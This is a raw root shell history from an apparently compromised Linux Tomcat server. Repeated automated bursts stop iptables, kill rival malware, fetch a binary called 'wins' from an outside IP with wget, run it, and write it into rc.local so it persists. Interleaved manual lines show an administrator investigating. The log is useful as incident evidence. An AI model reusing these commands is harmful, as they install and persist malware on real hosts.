  474  2014-01-20 21:45:06 root killall idmapd.so.cp
  475  2014-01-20 21:45:06 root killall .IptabLex
  476  2014-01-20 21:45:06 root killall .IptabLes
  477  2014-01-20 21:45:06 root killall linuxssh
  478  2014-01-20 21:45:06 root killall strutsbin
  479  2014-01-20 21:45:06 root killall 266189
  480  2014-01-20 21:45:06 root killall auto.bin
  481  2014-01-20 21:45:06 root rm -f -r /etc/idmapd/idmapd.so.cp
  482  2014-01-20 21:45:06 root rm -f -r /tmp/linuxx
  483  2014-01-20 21:45:06 root rm -f -r /tmp/ssh3
  484  2014-01-20 21:45:06 root rm -f -r /tmp/sh4
  485  2014-01-20 21:45:06 root rm -f -r /tmp/ssh6
  486  2014-01-20 21:45:06 root rm -f -r /tmp/ssh-32
  487  2014-01-20 21:45:06 root rm -f -r /tmp/ssh-64
  488  2014-01-20 21:45:06 root rm -f -r /tmp/ssh-c4
  489  2014-01-20 21:45:06 root rm -f -r /tmp/drmc
  490  2014-01-20 21:45:06 root rm -f -r /tmp/tmpof
  491  2014-01-20 21:45:06 root rm -f -r /tmp/1471
  492  2014-01-20 21:45:06 root rm -f -r /tmp/1417
  493  2014-01-20 21:45:06 root rm -f -r /tmp/v432
  494  2014-01-20 21:45:06 root rm -f -r /tmp/v532
  495  2014-01-20 21:45:06 root rm -f -r /tmp/29881
  496  2014-01-20 21:45:06 root rm -f -r /tmp/10993
  497  2014-01-20 21:45:06 root rm -f -r /tmp/behsdf
  498  2014-01-20 21:45:06 root rm -f -r /tmp/helen
  499  2014-01-20 21:45:06 root rm -f -r /tmp/lampp
  500  2014-01-20 21:45:06 root rm -f -r /tmp/Umi34Ber
  501  2014-01-20 21:45:06 root rm -f -r /tmp/mysql.sock
  502  2014-01-20 21:45:06 root rm -f -r /tmp/266189
  503  2014-01-20 21:45:06 root rm -f -r /etc/x1
  504  2014-01-20 21:45:06 root rm -f -r /etc/xxx
  505  2014-01-20 21:45:06 root rm -f -r /etc/dos32
  506  2014-01-20 21:45:06 root rm -f -r /etc/dos64
  507  2014-01-20 21:45:06 root rm -f -r /etc/007
  508  2014-01-20 21:45:06 root rm -f -r /etc/t32
  509  2014-01-20 21:45:06 root rm -f -r /etc/lq64
  510  2014-01-20 21:45:06 root rm -f -r /etc/t64
  511  2014-01-20 21:45:06 root rm -f -r /etc/lq32
  512  2014-01-20 21:45:06 root rm -f -r /etc/java.132.8_11
  513  2014-01-20 21:45:06 root rm -f -r /etc/idmapd/apd.so.cp
  514  2014-01-20 21:45:06 root rm -f -r /tmp/sshbin
  515  2014-01-20 21:45:06 root rm -f -r /tmp/xudp
  516  2014-01-20 21:45:06 root rm -f -r /tmp/xupd1
  517  2014-01-20 21:45:06 root rm -f -r /tmp/xudp2
  518  2014-01-20 21:45:06 root rm -f -r /tmp/xudp3
  519  2014-01-20 21:45:06 root rm -f -r /tmp/xudp4
  520  2014-01-20 21:45:06 root rm -f -r /tmp/xudp5
  521  2014-01-20 21:45:06 root rm -f -r /tmp/java.2.15.22_20
  522  2014-01-20 21:45:06 root rm -f -r /tmp/linuxssh
  523  2014-01-20 21:45:06 root rm -f -r /tmp/strutsbin
  524  2014-01-20 21:45:06 root rm -f -r /tmp/266189
  525  2014-01-20 21:45:06 root rm -f -r etc/java.13.2.8_11
  526  2014-01-20 21:45:06 root rm -f -r /etc/auto.bin
  527  2014-01-20 21:45:06 root find /etc/ -name "*.service2" -exec rm {} \;
  528  2014-01-20 21:45:06 root killall java-2013
  529  2014-01-20 21:45:06 root killall wins
  530  2014-01-20 21:45:06 root rm -f -r /etc/wins
  531  2014-01-20 21:45:06 root rm -f -r /etc/java-2013
  532  2014-01-20 21:45:06 root rm -f -r /etc/java-2013/java-2013
  533  2014-01-20 21:45:06 root mkdir /etc/wins
  534  2014-01-20 21:45:06 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  535  2014-01-20 21:45:07 root chmod 0755 /etc/wins/wins
  536  2014-01-20 21:45:07 root nohup /etc/wins/wins > /dev/null 2>&1 &
  537  2014-01-20 21:45:07 root rm -f -r /etc/rc.local
  538  2014-01-20 21:45:07 root rm -r -f /etc/rc.d/rc.local
  539  2014-01-20 21:45:07 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  540  2014-01-20 21:45:07 root echo "cd /etc/wins">>/etc/rc.local
  541  2014-01-20 21:45:07 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  542  2014-01-20 21:45:07 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  543  2014-01-20 21:45:07 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  544  2014-01-20 21:45:07 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  545  2014-01-20 21:45:07 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  546  2014-01-20 21:45:07 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  547  2014-01-20 21:45:07 root rm -f -r 2618
  548  2014-01-20 21:45:07 root rm -r -f TS269
  549  2014-01-20 21:45:07 root exit
  550  2014-01-20 21:58:47 root /etc/init.d/iptables stop
  551  2014-01-20 21:58:47 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  552  2014-01-20 21:58:47 root chmod 0775 /usr/bin/nohup
  553  2014-01-20 21:58:47 root chmod 0775 /usr/bin/killall
  554  2014-01-20 21:58:47 root killall lixtest
  555  2014-01-20 21:58:47 root killall linuxx
  556  2014-01-20 21:58:47 root killall ssh3
  557  2014-01-20 21:58:47 root killall ssh4
  558  2014-01-20 21:58:47 root killall ssh6
  559  2014-01-20 21:58:47 root killall ssh-32
  560  2014-01-20 21:58:47 root killall ssh-64
  561  2014-01-20 21:58:47 root killall ssh-c4
  562  2014-01-20 21:58:47 root killall java.13.2.8_11
  563  2014-01-20 21:58:47 root killall drmc
  564  2014-01-20 21:58:47 root killall tmpof
  565  2014-01-20 21:58:47 root killall 1471
  566  2014-01-20 21:58:47 root killall 1417
  567  2014-01-20 21:58:47 root killall v432
  568  2014-01-20 21:58:47 root killall v532
  569  2014-01-20 21:58:47 root killall 29881
  570  2014-01-20 21:58:47 root killall 10993
  571  2014-01-20 21:58:47 root killall behsdf
  572  2014-01-20 21:58:47 root killall helen
  573  2014-01-20 21:58:47 root killall lampp
  574  2014-01-20 21:58:47 root killall Umi34Ber
  575  2014-01-20 21:58:47 root killall mysql.sock
  576  2014-01-20 21:58:47 root killall sshd
  577  2014-01-20 21:58:47 root killall xxx
  578  2014-01-20 21:58:47 root killall dos32
  579  2014-01-20 21:58:47 root killall dos64
  580  2014-01-20 21:58:47 root killall 007
  581  2014-01-20 21:58:47 root killall t32
  582  2014-01-20 21:58:47 root killall lq64
  583  2014-01-20 21:58:47 root killall t64
  584  2014-01-20 21:58:47 root killall lq32
  585  2014-01-20 21:58:47 root killall java.132.8_11
  586  2014-01-20 21:58:47 root killall 261180
  587  2014-01-20 21:58:47 root killall sshbin
  588  2014-01-20 21:58:47 root killall xudp
  589  2014-01-20 21:58:47 root killall xupd1
  590  2014-01-20 21:58:47 root killall xudp2
  591  2014-01-20 21:58:47 root killall xudp3
  592  2014-01-20 21:58:47 root killall xudp4
  593  2014-01-20 21:58:47 root killall xudp5
  594  2014-01-20 21:58:47 root killall /etc/idmapd/idmapd.so.cp
  595  2014-01-20 21:58:47 root killall idmapd.so.cp
  596  2014-01-20 21:58:47 root killall .IptabLex
  597  2014-01-20 21:58:47 root killall .IptabLes
  598  2014-01-20 21:58:47 root killall linuxssh
  599  2014-01-20 21:58:47 root killall strutsbin
  600  2014-01-20 21:58:47 root killall 266189
  601  2014-01-20 21:58:47 root killall auto.bin
  602  2014-01-20 21:58:47 root rm -f -r /etc/idmapd/idmapd.so.cp
  603  2014-01-20 21:58:47 root rm -f -r /tmp/linuxx
  604  2014-01-20 21:58:47 root rm -f -r /tmp/ssh3
  605  2014-01-20 21:58:47 root rm -f -r /tmp/sh4
  606  2014-01-20 21:58:47 root rm -f -r /tmp/ssh6
  607  2014-01-20 21:58:47 root rm -f -r /tmp/ssh-32
  608  2014-01-20 21:58:47 root rm -f -r /tmp/ssh-64
  609  2014-01-20 21:58:47 root rm -f -r /tmp/ssh-c4
  610  2014-01-20 21:58:47 root rm -f -r /tmp/drmc
  611  2014-01-20 21:58:47 root rm -f -r /tmp/tmpof
  612  2014-01-20 21:58:47 root rm -f -r /tmp/1471
  613  2014-01-20 21:58:47 root rm -f -r /tmp/1417
  614  2014-01-20 21:58:47 root rm -f -r /tmp/v432
  615  2014-01-20 21:58:47 root rm -f -r /tmp/v532
  616  2014-01-20 21:58:47 root rm -f -r /tmp/29881
  617  2014-01-20 21:58:47 root rm -f -r /tmp/10993
  618  2014-01-20 21:58:47 root rm -f -r /tmp/behsdf
  619  2014-01-20 21:58:47 root rm -f -r /tmp/helen
  620  2014-01-20 21:58:47 root rm -f -r /tmp/lampp
  621  2014-01-20 21:58:47 root rm -f -r /tmp/Umi34Ber
  622  2014-01-20 21:58:47 root rm -f -r /tmp/mysql.sock
  623  2014-01-20 21:58:47 root rm -f -r /tmp/266189
  624  2014-01-20 21:58:47 root rm -f -r /etc/x1
  625  2014-01-20 21:58:47 root rm -f -r /etc/xxx
  626  2014-01-20 21:58:47 root rm -f -r /etc/dos32
  627  2014-01-20 21:58:47 root rm -f -r /etc/dos64
  628  2014-01-20 21:58:47 root rm -f -r /etc/007
  629  2014-01-20 21:58:47 root rm -f -r /etc/t32
  630  2014-01-20 21:58:47 root rm -f -r /etc/lq64
  631  2014-01-20 21:58:47 root rm -f -r /etc/t64
  632  2014-01-20 21:58:47 root rm -f -r /etc/lq32
  633  2014-01-20 21:58:47 root rm -f -r /etc/java.132.8_11
  634  2014-01-20 21:58:47 root rm -f -r /etc/idmapd/apd.so.cp
  635  2014-01-20 21:58:47 root rm -f -r /tmp/sshbin
  636  2014-01-20 21:58:47 root rm -f -r /tmp/xudp
  637  2014-01-20 21:58:47 root rm -f -r /tmp/xupd1
  638  2014-01-20 21:58:47 root rm -f -r /tmp/xudp2
  639  2014-01-20 21:58:47 root rm -f -r /tmp/xudp3
  640  2014-01-20 21:58:47 root rm -f -r /tmp/xudp4
  641  2014-01-20 21:58:47 root rm -f -r /tmp/xudp5
  642  2014-01-20 21:58:47 root rm -f -r /tmp/java.2.15.22_20
  643  2014-01-20 21:58:47 root rm -f -r /tmp/linuxssh
  644  2014-01-20 21:58:47 root rm -f -r /tmp/strutsbin
  645  2014-01-20 21:58:47 root rm -f -r /tmp/266189
  646  2014-01-20 21:58:47 root rm -f -r etc/java.13.2.8_11
  647  2014-01-20 21:58:47 root rm -f -r /etc/auto.bin
  648  2014-01-20 21:58:47 root find /etc/ -name "*.service2" -exec rm {} \;
  649  2014-01-20 21:58:47 root killall java-2013
  650  2014-01-20 21:58:47 root killall wins
  651  2014-01-20 21:58:47 root rm -f -r /etc/wins
  652  2014-01-20 21:58:47 root rm -f -r /etc/java-2013
  653  2014-01-20 21:58:47 root rm -f -r /etc/java-2013/java-2013
  654  2014-01-20 21:58:47 root mkdir /etc/wins
  655  2014-01-20 21:58:47 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  656  2014-01-20 21:58:49 root chmod 0755 /etc/wins/wins
  657  2014-01-20 21:58:49 root nohup /etc/wins/wins > /dev/null 2>&1 &
  658  2014-01-20 21:58:49 root rm -f -r /etc/rc.local
  659  2014-01-20 21:58:49 root rm -r -f /etc/rc.d/rc.local
  660  2014-01-20 21:58:49 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  661  2014-01-20 21:58:49 root echo "cd /etc/wins">>/etc/rc.local
  662  2014-01-20 21:58:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  663  2014-01-20 21:58:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  664  2014-01-20 21:58:49 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  665  2014-01-20 21:58:49 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  666  2014-01-20 21:58:49 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  667  2014-01-20 21:58:49 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  668  2014-01-20 21:58:49 root rm -f -r 2618
  669  2014-01-20 21:58:49 root rm -r -f TS269
  670  2014-01-20 21:58:49 root exit
  671  2014-01-20 22:01:32 root /etc/init.d/iptables stop
  672  2014-01-20 22:01:32 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  673  2014-01-20 22:01:32 root chmod 0775 /usr/bin/nohup
  674  2014-01-20 22:01:32 root chmod 0775 /usr/bin/killall
  675  2014-01-20 22:01:32 root killall lixtest
  676  2014-01-20 22:01:32 root killall linuxx
  677  2014-01-20 22:01:32 root killall ssh3
  678  2014-01-20 22:01:32 root killall ssh4
  679  2014-01-20 22:01:32 root killall ssh6
  680  2014-01-20 22:01:32 root killall ssh-32
  681  2014-01-20 22:01:32 root killall ssh-64
  682  2014-01-20 22:01:32 root killall ssh-c4
  683  2014-01-20 22:01:32 root killall java.13.2.8_11
  684  2014-01-20 22:01:32 root killall drmc
  685  2014-01-20 22:01:32 root killall tmpof
  686  2014-01-20 22:01:32 root killall 1471
  687  2014-01-20 22:01:32 root killall 1417
  688  2014-01-20 22:01:32 root killall v432
  689  2014-01-20 22:01:32 root killall v532
  690  2014-01-20 22:01:32 root killall 29881
  691  2014-01-20 22:01:32 root killall 10993
  692  2014-01-20 22:01:32 root killall behsdf
  693  2014-01-20 22:01:32 root killall helen
  694  2014-01-20 22:01:32 root killall lampp
  695  2014-01-20 22:01:32 root killall Umi34Ber
  696  2014-01-20 22:01:32 root killall mysql.sock
  697  2014-01-20 22:01:32 root killall sshd
  698  2014-01-20 22:01:32 root killall xxx
  699  2014-01-20 22:01:32 root killall dos32
  700  2014-01-20 22:01:32 root killall dos64
  701  2014-01-20 22:01:32 root killall 007
  702  2014-01-20 22:01:32 root killall t32
  703  2014-01-20 22:01:32 root killall lq64
  704  2014-01-20 22:01:32 root killall t64
  705  2014-01-20 22:01:32 root killall lq32
  706  2014-01-20 22:01:32 root killall java.132.8_11
  707  2014-01-20 22:01:32 root killall 261180
  708  2014-01-20 22:01:32 root killall sshbin
  709  2014-01-20 22:01:32 root killall xudp
  710  2014-01-20 22:01:32 root killall xupd1
  711  2014-01-20 22:01:32 root killall xudp2
  712  2014-01-20 22:01:32 root killall xudp3
  713  2014-01-20 22:01:32 root killall xudp4
  714  2014-01-20 22:01:32 root killall xudp5
  715  2014-01-20 22:01:32 root killall /etc/idmapd/idmapd.so.cp
  716  2014-01-20 22:01:32 root killall idmapd.so.cp
  717  2014-01-20 22:01:32 root killall .IptabLex
  718  2014-01-20 22:01:32 root killall .IptabLes
  719  2014-01-20 22:01:32 root killall linuxssh
  720  2014-01-20 22:01:32 root killall strutsbin
  721  2014-01-20 22:01:32 root killall 266189
  722  2014-01-20 22:01:32 root killall auto.bin
  723  2014-01-20 22:01:32 root rm -f -r /etc/idmapd/idmapd.so.cp
  724  2014-01-20 22:01:32 root rm -f -r /tmp/linuxx
  725  2014-01-20 22:01:32 root rm -f -r /tmp/ssh3
  726  2014-01-20 22:01:32 root rm -f -r /tmp/sh4
  727  2014-01-20 22:01:32 root rm -f -r /tmp/ssh6
  728  2014-01-20 22:01:32 root rm -f -r /tmp/ssh-32
  729  2014-01-20 22:01:32 root rm -f -r /tmp/ssh-64
  730  2014-01-20 22:01:32 root rm -f -r /tmp/ssh-c4
  731  2014-01-20 22:01:32 root rm -f -r /tmp/drmc
  732  2014-01-20 22:01:32 root rm -f -r /tmp/tmpof
  733  2014-01-20 22:01:32 root rm -f -r /tmp/1471
  734  2014-01-20 22:01:32 root rm -f -r /tmp/1417
  735  2014-01-20 22:01:32 root rm -f -r /tmp/v432
  736  2014-01-20 22:01:32 root rm -f -r /tmp/v532
  737  2014-01-20 22:01:32 root rm -f -r /tmp/29881
  738  2014-01-20 22:01:32 root rm -f -r /tmp/10993
  739  2014-01-20 22:01:32 root rm -f -r /tmp/behsdf
  740  2014-01-20 22:01:32 root rm -f -r /tmp/helen
  741  2014-01-20 22:01:32 root rm -f -r /tmp/lampp
  742  2014-01-20 22:01:32 root rm -f -r /tmp/Umi34Ber
  743  2014-01-20 22:01:32 root rm -f -r /tmp/mysql.sock
  744  2014-01-20 22:01:32 root rm -f -r /tmp/266189
  745  2014-01-20 22:01:32 root rm -f -r /etc/x1
  746  2014-01-20 22:01:32 root rm -f -r /etc/xxx
  747  2014-01-20 22:01:32 root rm -f -r /etc/dos32
  748  2014-01-20 22:01:32 root rm -f -r /etc/dos64
  749  2014-01-20 22:01:32 root rm -f -r /etc/007
  750  2014-01-20 22:01:32 root rm -f -r /etc/t32
  751  2014-01-20 22:01:32 root rm -f -r /etc/lq64
  752  2014-01-20 22:01:32 root rm -f -r /etc/t64
  753  2014-01-20 22:01:32 root rm -f -r /etc/lq32
  754  2014-01-20 22:01:32 root rm -f -r /etc/java.132.8_11
  755  2014-01-20 22:01:32 root rm -f -r /etc/idmapd/apd.so.cp
  756  2014-01-20 22:01:32 root rm -f -r /tmp/sshbin
  757  2014-01-20 22:01:32 root rm -f -r /tmp/xudp
  758  2014-01-20 22:01:32 root rm -f -r /tmp/xupd1
  759  2014-01-20 22:01:32 root rm -f -r /tmp/xudp2
  760  2014-01-20 22:01:32 root rm -f -r /tmp/xudp3
  761  2014-01-20 22:01:32 root rm -f -r /tmp/xudp4
  762  2014-01-20 22:01:32 root rm -f -r /tmp/xudp5
  763  2014-01-20 22:01:32 root rm -f -r /tmp/java.2.15.22_20
  764  2014-01-20 22:01:32 root rm -f -r /tmp/linuxssh
  765  2014-01-20 22:01:32 root rm -f -r /tmp/strutsbin
  766  2014-01-20 22:01:32 root rm -f -r /tmp/266189
  767  2014-01-20 22:01:32 root rm -f -r etc/java.13.2.8_11
  768  2014-01-20 22:01:32 root rm -f -r /etc/auto.bin
  769  2014-01-20 22:01:32 root find /etc/ -name "*.service2" -exec rm {} \;
  770  2014-01-20 22:01:32 root killall java-2013
  771  2014-01-20 22:01:32 root killall wins
  772  2014-01-20 22:01:32 root rm -f -r /etc/wins
  773  2014-01-20 22:01:32 root rm -f -r /etc/java-2013
  774  2014-01-20 22:01:32 root rm -f -r /etc/java-2013/java-2013
  775  2014-01-20 22:01:32 root mkdir /etc/wins
  776  2014-01-20 22:01:32 root wget -O /etc/wins/wins http://60.174.234.107:1974/wins
  777  2014-01-20 22:01:34 root chmod 0755 /etc/wins/wins
  778  2014-01-20 22:01:34 root nohup /etc/wins/wins > /dev/null 2>&1 &
  779  2014-01-20 22:01:34 root rm -f -r /etc/rc.local
  780  2014-01-20 22:01:34 root rm -r -f /etc/rc.d/rc.local
  781  2014-01-20 22:01:34 root echo "/etc/init.d/iptables stop">>/etc/rc.local
  782  2014-01-20 22:01:34 root echo "cd /etc/wins">>/etc/rc.local
  783  2014-01-20 22:01:34 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.local
  784  2014-01-20 22:01:34 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.local
  785  2014-01-20 22:01:34 root echo "/etc/init.d/iptables stop">>/etc/rc.d/rc.local
  786  2014-01-20 22:01:34 root echo "cd /etc/wins">>/etc/rc.d/rc.local
  787  2014-01-20 22:01:34 root echo "chmod 0755 /etc/wins/wins">>/etc/rc.d/rc.local
  788  2014-01-20 22:01:34 root echo "nohup /etc/wins/wins > /dev/null 2>&1 &">>/etc/rc.d/rc.local
  789  2014-01-20 22:01:34 root rm -f -r 2618
  790  2014-01-20 22:01:34 root rm -r -f TS269
  791  2014-01-20 22:01:34 root exit
  792  2014-01-20 22:13:18 root ps -ef
  793  2014-01-20 22:13:25 root ps -ef |more
  794  2014-01-20 22:15:05 root ps -ef |more
  795  2014-01-20 22:16:34 root ps -ef |more
  796  2014-01-20 22:17:08 root top
  797  2014-01-20 22:17:20 root ps -ef |more
  798  2014-01-20 22:18:17 root ll -a /
  799  2014-01-20 22:18:58 root ll -a /boot/
  800  2014-01-20 22:19:39 root ps -ef |more
  801  2014-01-20 22:21:02 root netstat -nltp
  802  2014-01-20 22:21:18 root netstat -nltp
  803  2014-01-20 22:23:10 root cd /opt/apache-tomcat-6.0.26/
  804  2014-01-20 22:23:11 root ls
  805  2014-01-20 22:23:15 root cd conf
  806  2014-01-20 22:23:16 root ls
  807  2014-01-20 22:23:37 root vi server.xml
  808  2014-01-20 22:25:09 root netstat -nltp
  809  2014-01-20 22:25:23 root vi server.xml
  810  2014-01-20 22:25:39 root netstat -nltp
  811  2014-01-20 22:25:57 root history
  812  2014-01-20 22:26:25 root cd /etc/idmapd/
  813  2014-01-20 22:26:31 root ll -a ./
  814  2014-01-20 22:26:47 root rm -r -f /etc/idmapd
  815  2014-01-20 22:26:52 root cd /etc/idmapd/
  816  2014-01-20 22:27:36 root vi server.xml
  817  2014-01-20 22:27:53 root pwd
  818  2014-01-20 22:28:02 root cd /opt/apache-tomcat-6.0.26/conf
  819  2014-01-20 22:28:03 root ls
  820  2014-01-20 22:28:09 root vi server.xml
  821  2014-01-20 22:12:32 root w
  822  2014-01-20 22:12:41 root crontab -e
  823  2014-01-20 22:12:56 root ps -efjH
  824  2014-01-20 22:13:02 root cd /tmp/
  825  2014-01-20 22:13:02 root ll
  826  2014-01-20 22:13:06 root cat winskilled
  827  2014-01-20 22:13:18 root ps -efjH
  828  2014-01-20 22:14:04 root cd
  829  2014-01-20 22:14:08 root cdf
  830  2014-01-20 22:14:10 root cdl
  831  2014-01-20 22:14:11 root ls
  832  2014-01-20 22:14:13 root cd
  833  2014-01-20 22:14:13 root ls
  834  2014-01-20 22:14:15 root vi killback.sh
  835  2014-01-20 22:15:22 root cd /tmp/
  836  2014-01-20 22:15:22 root ls
  837  2014-01-20 22:15:27 root cat winskilled
  838  2014-01-20 22:16:23 root 平时
  839  2014-01-20 22:16:25 root ps -efjH
  840  2014-01-20 22:23:37 root :q
  841  2014-01-20 22:27:04 root tail -f /tmp/winskilled
  842  2014-01-20 22:29:08 root 227909
  843  2014-01-20 22:29:08 root netstat -nltp
  844  2014-01-20 22:25:23 root vi server.xml
  845  2014-01-20 22:25:39 root netstat -nltp
  846  2014-01-20 22:25:57 root history
  847  2014-01-20 22:26:25 root cd /etc/idmapd/
  848  2014-01-20 22:26:31 root ll -a ./
  849  2014-01-20 22:26:47 root rm -r -f /etc/idmapd
  850  2014-01-20 22:26:52 root cd /etc/idmapd/
  851  2014-01-20 22:27:36 root vi server.xml
  852  2014-01-20 22:27:53 root pwd
  853  2014-01-20 22:28:02 root cd /opt/apache-tomcat-6.0.26/conf
  854  2014-01-20 22:28:03 root ls
  855  2014-01-20 22:28:09 root vi server.xml
  856  2014-01-20 22:19:21 root crontab -l
  857  2014-01-20 22:19:28 root crontab -l
  858  2014-01-20 22:19:29 root cd /tmp/
  859  2014-01-20 22:19:30 root ll
  860  2014-01-20 22:19:34 root tail -f winskilled
  861  2014-01-20 22:21:14 root ps -ef|grep -v grep |grep wins
  862  2014-01-20 22:21:19 root ps -ef|grep -v grep
  863  2014-01-20 22:21:21 root ps -ef|grep -v grep |grep wins
  864  2014-01-20 22:21:28 root ps -ef |grep wins
  865  2014-01-20 22:21:43 root ps -ef|grep -v grep |grep wins -C3
  866  2014-01-20 22:21:46 root ps -ef|grep -v grep |grep wins -C3
  867  2014-01-20 22:23:28 root :q:::q
  868  2014-01-20 22:23:43 root ps
  869  2014-01-20 22:23:44 root ll
  870  2014-01-20 22:23:47 root tail -f winskilled
  871  2014-01-20 22:23:58 root vi winskilled
  872  2014-01-20 22:24:19 root :q
  873  2014-01-20 22:24:24 root vi winskilled
  874  2014-01-20 22:24:30 root o
  875  2014-01-20 22:24:37 root vi winskilled
  876  2014-01-20 22:24:44 root vi winskilled
  877  2014-01-20 22:24:50 root ll
  878  2014-01-20 22:24:55 root vi winskilled
  879  2014-01-20 22:25:04 root cat /root/killback.sh
  880  2014-01-20 22:28:19 root /etc/init.d/iptables stop
  881  2014-01-20 22:28:19 root echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  882  2014-01-20 22:28:19 root chmod 0775 /usr/bin/nohup
  883  2014-01-20 22:28:19 root chmod 0775 /usr/bin/killall
  884  2014-01-20 22:28:19 root killall lixtest
  885  2014-01-20 22:28:19 root killall linuxx
  886  2014-01-20 22:28:19 root killall ssh3
  887  2014-01-20 22:28:19 root killall ssh4
  888  2014-01-20 22:28:19 root killall ssh6
  889  2014-01-20 22:28:19 root killall ssh-32
  890  2014-01-20 22:28:19 root killall ssh-64
  891  2014-01-20 22:28:19 root killall ssh-c4
  892  2014-01-20 22:28:19 root killall java.13.2.8_11
  893  2014-01-20 22:28:19 root killall drmc
  894  2014-01-20 22:28:19 root killall tmpof
  895  2014-01-20 22:28:19 root killall 1471
  896  2014-01-20 22:28:19 root killall 1417
  897  2014-01-20 22:28:19 root killall v432
  898  2014-01-20 22:28:19 root killall v532
  899  2014-01-20 22:28:19 root killall 29881
  900  2014-01-20 22:28:19 root killall 10993
  901  2014-01-20 22:28:19 root killall behsdf
  902  2014-01-20 22:28:19 root killall helen
  903  2014-01-20 22:28:19 root killall lampp
  904  2014-01-20 22:28:19 root killall Umi34Ber
  905  2014-01-20 22:28:19 root killall mysql.sock
  906  2014-01-20 22:28:19 root killall sshd
  907  2014-01-20 22:28:19 root killall xxx
  908  2014-01-20 22:28:19 root killall dos32
  909  2014-01-20 22:28:19 root killall dos64
  910  2014-01-20 22:28:19 root killall 007
  911  2014-01-20 22:28:19 root killall t32
  912  2014-01-20 22:28:19 root killall lq64
  913  2014-01-20 22:28:19 root killall t64
  914  2014-01-20 22:28:19 root killall lq32
  915  2014-01-20 22:28:19 root killall java.132.8_11
  916  2014-01-20 22:28:19 root killall 261180
  917  2014-01-20 22:28:19 root killall sshbin
  918  2014-01-20 22:28:19 root killall xudp
  919  2014-01-20 22:28:19 root killall xupd1
  920  2014-01-20 22:28:19 root killall xudp2
  921  2014-01-20 22:28:19 root killall xudp3
  922  2014-01-20 22:28:19 root killall xudp4
  923  2014-01-20 22:28:19 root killall xudp5
  924  2014-01-20 22:28:20 root killall /etc/idmapd/idmapd.so.cp
  925  2014-01-20 22:28:20 root killall idmapd.so.cp
  926  2014-01-20 22:28:20 root killall .IptabLex
  927  2014-01-20 22:28:20 root killall .IptabLes
  928  2014-01-20 22:28:20 root killall linuxssh
  929  2014-01-20 22:28:20 root killall strutsbin
  930  2014-01-20 22:28:20 root killall 266189
  931  2014-01-20 22:28:20 root killall auto.bin
  932  2014-01-20 22:28:20 root rm -f -r /etc/idmapd/idmapd.so.cp
  933  2014-01-20 22:28:20 root rm -f -r /tmp/linuxx
  934  2014-01-20 22:28:20 root rm -f -r /tmp/ssh3
  935  2014-01-20 22:28:20 root rm -f -r /tmp/sh4
  936  2014-01-20 22:28:20 root rm -f -r /tmp/ssh6
  937  2014-01-20 22:28:20 root rm -f -r /tmp/ssh-32
  938  2014-01-20 22:28:20 root rm -f -r /tmp/ssh-64
  939  2014-01-20 22:28:20 root rm -f -r /tmp/ssh-c4
  940  2014-01-20 22:28:20 root rm -f -r /tmp/drmc
  941  2014-01-20 22:28:20 root rm -f -r /tmp/tmpof
  942  2014-01-20 22:28:20 root rm -f -r /tmp/1471
  943  2014-01-20 22:28:20 root rm -f -r /tmp/1417
  944  2014-01-20 22:28:20 root rm -f -r /tmp/v432
  945  2014-01-20 22:28:20 root rm -f -r /tmp/v532
  946  2014-01-20 22:28:20 root rm -f -r /tmp/29881
  947  2014-01-20 22:28:20 root rm -f -r /tmp/10993
  948  2014-01-20 22:28:20 root rm -f -r /tmp/behsdf
  949  2014-01-20 22:28:20 root rm -f -r /tmp/helen
  950  2014-01-20 22:28:20 root rm -f -r /tmp/lampp
  951  2014-01-20 22:28:20 root rm -f -r /tmp/Umi34Ber
  952  2014-01-20 22:28:20 root rm -f -r /tmp/mysql.sock
  953  2014-01-20 22:28:20 root rm -f -r /tmp/266189
  954  2014-01-20 22:28:20 root rm -f -r /etc/x1
  955  2014-01-20 22:28:20 root rm -f -r /etc/xxx
  956  2014-01-20 22:28:20 root rm -f -r /etc/dos32
  957  2014-01-20 22:28:20 root rm -f -r /etc/dos64
  958  2014-01-20 22:28:20 root rm -f -r /etc/007
  959  2014-01-20 22:28:20 root rm -f -r /etc/t32
  960  2014-01-20 22:28:20 root rm -f -r /etc/lq64
  961  2014-01-20 22:28:20 root rm -f -r /etc/t64
  962  2014-01-20 22:28:20 root rm -f -r /etc/lq32
  963  2014-01-20 22:28:20 root rm -f -r /etc/java.132.8_11
  964  2014-01-20 22:28:20 root rm -f -r /etc/idmapd/apd.so.cp
  965  2014-01-20 22:28:20 root rm -f -r /tmp/sshbin
  966  2014-01-20 22:28:20 root rm -f -r /tmp/xudp
  967  2014-01-20 22:28:20 root rm -f -r /tmp/xupd1
  968  2014-01-20 22:28:20 root rm -f -r /tmp/xudp2
  969  2014-01-20 22:28:20 root rm -f -r /tmp/xudp3
  970  2014-01-20 22:28:20 root rm -f -r /tmp/xudp4
  971  2014-01-20 22:28:20 root rm -f -r /tmp/xudp5
  972  2014-01-20 22:28:20 root rm -f -r /tmp/java.2.15.22_20
  973  2014-01-20 22:28:20 root rm -f -r /tmp/linuxssh
  974  2014-01-20 22:28:20 root rm -f -r /tmp/strutsbin
  975  2014-01-20 22:28:20 root rm -f -r /tmp/266189
  976  2014-01-20 22:28:20 root rm -f -r etc/java.13.2.8_11
  977  2014-01-20 22:28:20 root rm -f -r /etc/auto.bin
  978  2014-01-20 22:28:20 root find /etc/ -name "*.service2" -exec rm {} \;
